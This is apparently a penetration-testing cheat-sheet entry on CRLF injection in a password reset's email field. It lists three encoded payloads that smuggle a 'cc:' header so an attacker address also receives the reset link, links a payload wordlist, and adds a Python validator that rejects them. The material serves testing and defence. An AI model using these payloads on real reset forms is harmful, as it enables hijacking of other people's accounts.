CRLF injection to add email CC
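If the password reset request's email parameter is copied into the outgoing mail's headers without filtering line breaks, inserting a line break and a cc: address adds a second recipient, who receives the reset link as well: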
email="victim-user@syslifters.com%0a%0dcc:attacker-user@syslifters.com"
email="victim-user@syslifters.com%0Acc:attacker-user@syslifters.com"
email="victim-user@syslifters.com%0A%20cc:attacker-user@syslifters.com"
CRLF wordlist:
https://github.com/cujanovic/CRLF-Injection-Payloads/blob/master/CRLF-payloads.txt
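A server-side check that rejects the three values above before the address reaches a mail header. This is an added example, not code from the original page; the function names, the address pattern and the reset link are assumptions.

```python
import re
import unicodedata
from email.message import EmailMessage
from urllib.parse import unquote

# Deliberately narrower than RFC 5322: one plain addr-spec, no display name, no list.
ADDRESS_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")

def validate_reset_email(value: str) -> str:
    """Return value unchanged, or raise ValueError if it could add mail headers."""
    for ch in value:
        # Cc covers CR, LF and NEL; Zl/Zp are the Unicode line/paragraph separators.
        if unicodedata.category(ch) in ("Cc", "Zl", "Zp"):
            raise ValueError(f"line break or control character U+{ord(ch):04X}")
    if not ADDRESS_RE.fullmatch(value):
        raise ValueError("not a single plain email address")
    return value

def build_reset_mail(value: str, link: str) -> EmailMessage:
    """Build the reset mail; the recipient is validated before it reaches a header."""
    msg = EmailMessage()
    msg["To"] = validate_reset_email(value)
    msg["Subject"] = "Password reset"
    msg.set_content(f"Reset link: {link}")
    return msg

def is_accepted(raw_form_value: str) -> bool:
    """Decode once, as the web framework would, then validate."""
    try:
        validate_reset_email(unquote(raw_form_value))
        return True
    except ValueError:
        return False

# Constructed sample input: the three values from this page plus a clean address.
SAMPLES = [
    "victim-user@syslifters.com%0a%0dcc:attacker-user@syslifters.com",
    "victim-user@syslifters.com%0Acc:attacker-user@syslifters.com",
    "victim-user@syslifters.com%0A%20cc:attacker-user@syslifters.com",
    "victim-user@syslifters.com",
]

if __name__ == "__main__":
    for raw in SAMPLES:
        print("accept" if is_accepted(raw) else "reject", raw)
    # Placeholder link, constructed for the example.
    print(build_reset_mail(SAMPLES[3], "https://app.example/reset?token=PLACEHOLDER"))
```

Rejecting the request outright, rather than stripping the line break and sending anyway, keeps the attempt visible in application logs.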